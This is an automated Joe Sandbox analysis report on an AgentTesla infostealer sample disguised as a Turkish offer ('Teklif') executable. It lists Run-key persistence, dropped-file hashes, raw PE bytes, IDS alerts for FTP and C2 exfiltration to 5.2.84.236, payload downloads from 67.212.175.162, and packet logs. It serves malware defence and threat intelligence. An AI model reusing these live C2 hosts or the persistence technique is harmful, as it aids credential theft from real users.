                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1520406
                                          Start date and time:2024-09-27 10:42:27 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 17s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:9
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Teklif-6205018797-6100052155-UUE.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@9/2@5/2
                                          EGA Information:
                                          • Successful, ratio: 83.3%
                                          HCA Information:
                                          • Successful, ratio: 90%
                                          • Number of executed functions: 420
                                          • Number of non-executed functions: 36
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target InstallUtil.exe, PID 5488 because it is empty
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: Teklif-6205018797-6100052155-UUE.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          04:43:36AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ptqlzgvzpfa C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe
                                          04:43:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ptqlzgvzpfa C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          67.212.175.162BITUMEN_60-70_-_JUMBO_Specification.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                          • www.northjerseylocksmith.net/2nbp/?ab=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1g60uhCq/kzTYQUQ==&wZHp=LTklpdd0lp
                                          EL-515-_HEAT_TRACING.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                          • www.northjerseylocksmith.net/2nbp/?I8Z=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1tnGq8XaOUlQYxDpzveej3TzCy&WN6=OLgLTlRhCRRxTxN
                                          5.2.84.236Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                              Product Specification Details 8576534-872.exeGet hashmaliciousAgentTeslaBrowse
                                                Teklif 8822321378 .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  https://www.rxjapan.jp/?wptouch_switch=desktop&redirect=http://5ln.gpr.carfield.com.tr./?YYY%3A%2F%2F%23.bWljaGFlbC5keWtlc0BjZXFsZC5vcmcuYXU=Get hashmaliciousUnknownBrowse
                                                    KAL_00192839403-28122021.cmd.exeGet hashmaliciousAgentTeslaBrowse
                                                      Halkbank.cmd.exeGet hashmaliciousAgentTeslaBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        wymascensores.comRFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 67.212.175.162
                                                        Su documento de env#U00edo--------pdf.exeGet hashmaliciousUnknownBrowse
                                                        • 67.212.175.162
                                                        Su documento de env#U00edo--------pdf.exeGet hashmaliciousUnknownBrowse
                                                        • 67.212.175.162
                                                        1715875158543a5e3b677362bc060cf9b6a7a69e2457d0c48ef2d6bda0e2ce3c4ddc38a017752.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        Teklif 8822321378 .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 67.212.175.162
                                                        rDocumentodeembarque.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 67.212.175.162
                                                        ORGB.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        16994321449b5d87caf658afbfe178cb9c8422736bcc47ae132c88fa1893a91c088bd24282963.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        Korea_Order-68652781178.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        jpg_7657689879_Detalles_del_producto_EBM_PAPST_ARGENTINA_S.A..exeGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        ftp.alternatifplastik.comOffer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 5.2.84.236
                                                        OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        Product Specification Details 8576534-872.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        SINGLEHOP-LLCUSPO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                                        • 172.96.187.60
                                                        RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 67.212.175.162
                                                        https://xtrafree.x10.mx/Get hashmaliciousUnknownBrowse
                                                        • 198.91.81.14
                                                        http://dev-265334124785.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                                        • 198.143.164.252
                                                        http://dev-gdtf.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                                        • 198.143.164.252
                                                        http://www.rb.gy/onu2r0/Get hashmaliciousUnknownBrowse
                                                        • 198.143.164.252
                                                        http://www.rb.gy/v99361/Get hashmaliciousUnknownBrowse
                                                        • 198.143.164.252
                                                        rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                                        • 172.96.187.60
                                                        http://www.rb.gy/yfdl7y/Get hashmaliciousUnknownBrowse
                                                        • 198.143.164.252
                                                        http://www.rb.gy/h66x7g/Get hashmaliciousUnknownBrowse
                                                        • 198.143.164.252
                                                        ALASTYRTRBROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                                        • 5.2.84.221
                                                        BROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                                        • 5.2.84.221
                                                        Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 5.2.84.236
                                                        eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                        • 5.2.85.36
                                                        OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        Product Specification Details 8576534-872.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 5.2.84.236
                                                        http://www.idecon.com.trGet hashmaliciousUnknownBrowse
                                                        • 5.2.84.231
                                                        Teklif 8822321378 .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 5.2.84.236
                                                        x21iMpR0I1.exeGet hashmaliciousFormBookBrowse
                                                        • 5.2.85.156
                                                        https://upvir.al/153868/lp153868Get hashmaliciousHTMLPhisherBrowse
                                                        • 5.2.85.131

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0eRFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                                        • 67.212.175.162
                                                        RTGS-WB-ABS-240730-NEW.lnkGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 67.212.175.162
                                                        Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 67.212.175.162
                                                        https://ojbkjs.vip/yb.jsGet hashmaliciousUnknownBrowse
                                                        • 67.212.175.162
                                                        QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 67.212.175.162
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 67.212.175.162
                                                        Purchase order.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 67.212.175.162
                                                        https://jbrizuelablplegal.taplink.ws/Get hashmaliciousHTMLPhisherBrowse
                                                        • 67.212.175.162
                                                        http://home-103607.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                        • 67.212.175.162

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):30208
                                                        Entropy (8bit):5.3534281837524365
                                                        Encrypted:false
                                                        SSDEEP:384:ANepKdJNF1oPvlsBrrFj95okNTvsYxksSvk0HFs0ZILHwz7A8iq8ziXuF:AcQ9F1oaBj95FkYmsScKZHGJt
                                                        MD5:A016634929C4D57CC24719723A4CD65C
                                                        SHA1:91E7492B6D3E543F185C69846BD175A626A931F5
                                                        SHA-256:182B161A951229364AEF6E16D358BEB00F285C9F146053471AD22E714EEFA719
                                                        SHA-512:5F36C1AD444AF94DFD4CA1D4AEF188049FFDCF2A336F58CFEEAD5A55176E580312D3944C229ED8B66CC852F0A4C86B711603EA34FF80EBF1DF6A3F84D61A695A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5.f.................l............... ........@.. ....................................`.................................<...J.................................................................................... ............... ..H............text....j... ...l.................. ..`.rsrc................n..............@..@.reloc...............t..............@..B................l.......H.......,F...D..........................................................*+.*(....+...0..>.........'...+.+.+.+.+.+.+#*.+.(....+..+.(....+.(....+.o....+.o....+....0..........+}8....8....8....8....8......9....&+D8....8.....-.......(........o......(....o .......,..(!......%,.X.,...-...o"....-.2..o#...*($...8y....8x...o%...8s....8r...s&...8m....8l....8n....8o....8n............5..T.......0.._........:S....+:.->&.,.+.r...p+.+....+.o'...+...+..,..-..o.....-..+..,.&..s(...+..+..+..+.&

                                                        C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):5.3534281837524365
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:Teklif-6205018797-6100052155-UUE.exe
                                                        File size:30'208 bytes
                                                        MD5:a016634929c4d57cc24719723a4cd65c
                                                        SHA1:91e7492b6d3e543f185c69846bd175a626a931f5
                                                        SHA256:182b161a951229364aef6e16d358beb00f285c9f146053471ad22e714eefa719
                                                        SHA512:5f36c1ad444af94dfd4ca1d4aef188049ffdcf2a336f58cfeead5a55176e580312d3944c229ed8b66cc852f0a4c86b711603ea34ff80ebf1df6a3f84d61a695a
                                                        SSDEEP:384:ANepKdJNF1oPvlsBrrFj95okNTvsYxksSvk0HFs0ZILHwz7A8iq8ziXuF:AcQ9F1oaBj95FkYmsScKZHGJt
                                                        TLSH:2CD2D68C738546ABE1AB1F7AA4F207994BF2F692775BC39F3640002A1DE37525C61723
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5.f.................l............... ........@.. ....................................`................................

                                                        File Icon

                                                        Icon Hash:00928e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x408a86
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x66F535CB [Thu Sep 26 10:22:03 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x8a3c0x4a.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x5ae.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x6a8c0x6c00c047a0195398db84e9dc60976185a50aFalse0.47164351851851855data5.479757107813364IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xa0000x5ae0x60023528740014c530cd2d4f6b9984aa211False0.4270833333333333data4.1245948590178IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xc0000xc0x200c447a5a93c8c9d2c91ecde24a0f18251False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_VERSION0xa05c0x32cdata0.4236453201970443
                                                        RT_MANIFEST0xa3c40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-09-27T10:43:23.015150+02002017962ET MALWARE PE EXE or DLL Windows file download disguised as ASCII167.212.175.162443192.168.2.549704TCP
                                                        2024-09-27T10:43:23.015150+02002022640ET MALWARE PE EXE or DLL Windows file download Text M2167.212.175.162443192.168.2.549704TCP
                                                        2024-09-27T10:43:39.090953+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.5497055.2.84.23621TCP
                                                        2024-09-27T10:43:39.726339+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.5497085.2.84.23655987TCP
                                                        2024-09-27T10:43:39.733257+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.5497085.2.84.23655987TCP
                                                        2024-09-27T10:43:46.488310+02002017962ET MALWARE PE EXE or DLL Windows file download disguised as ASCII167.212.175.162443192.168.2.552073TCP
                                                        2024-09-27T10:43:46.488310+02002022640ET MALWARE PE EXE or DLL Windows file download Text M2167.212.175.162443192.168.2.552073TCP
                                                        2024-09-27T10:43:54.928209+02002017962ET MALWARE PE EXE or DLL Windows file download disguised as ASCII167.212.175.162443192.168.2.552077TCP
                                                        2024-09-27T10:43:54.928209+02002022640ET MALWARE PE EXE or DLL Windows file download Text M2167.212.175.162443192.168.2.552077TCP
                                                        2024-09-27T10:44:02.252408+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.5520785.2.84.23621TCP
                                                        2024-09-27T10:44:02.871511+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.5520795.2.84.23660855TCP
                                                        2024-09-27T10:44:02.882716+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.5520795.2.84.23660855TCP
                                                        2024-09-27T10:44:10.402749+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.5520805.2.84.23621TCP
                                                        2024-09-27T10:44:11.022491+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.5520815.2.84.23652109TCP
                                                        2024-09-27T10:44:11.027817+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.5520815.2.84.23652109TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 27, 2024 10:43:22.189377069 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:22.189418077 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.189523935 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:22.208101034 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:22.208123922 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.721179962 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.721383095 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:22.733526945 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:22.733547926 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.733957052 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.779961109 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:22.827406883 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.905536890 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.905570030 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.905579090 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.905653954 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:22.905678034 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.926594973 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.926805973 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:22.926832914 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.971777916 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:22.993429899 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.993441105 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.993472099 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.993509054 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:22.993556976 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:22.994891882 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.994899988 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.994956017 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:22.995759964 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.995765924 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:22.995820999 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.015168905 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.015177965 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.015243053 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.081780910 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.081789970 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.081887007 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.082282066 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.082289934 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.082346916 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.083074093 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.083133936 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.083813906 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.083898067 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.084654093 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.084738016 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.084995031 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.085067987 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.085771084 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.085838079 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.103717089 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.103812933 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.170500994 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.170548916 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.170583010 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.170598030 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.170648098 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.170648098 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.170969963 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.171035051 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.171375990 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.171435118 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.171902895 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.171957970 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.172338963 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.172405005 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.172874928 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.172934055 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.173170090 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.173233986 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.173686028 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.173763990 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.174127102 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.174190998 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.174621105 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.174680948 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.175054073 CEST4434970467.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:23.175113916 CEST49704443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:23.175558090 CEST4434970467.212.175.162192.168.2.5
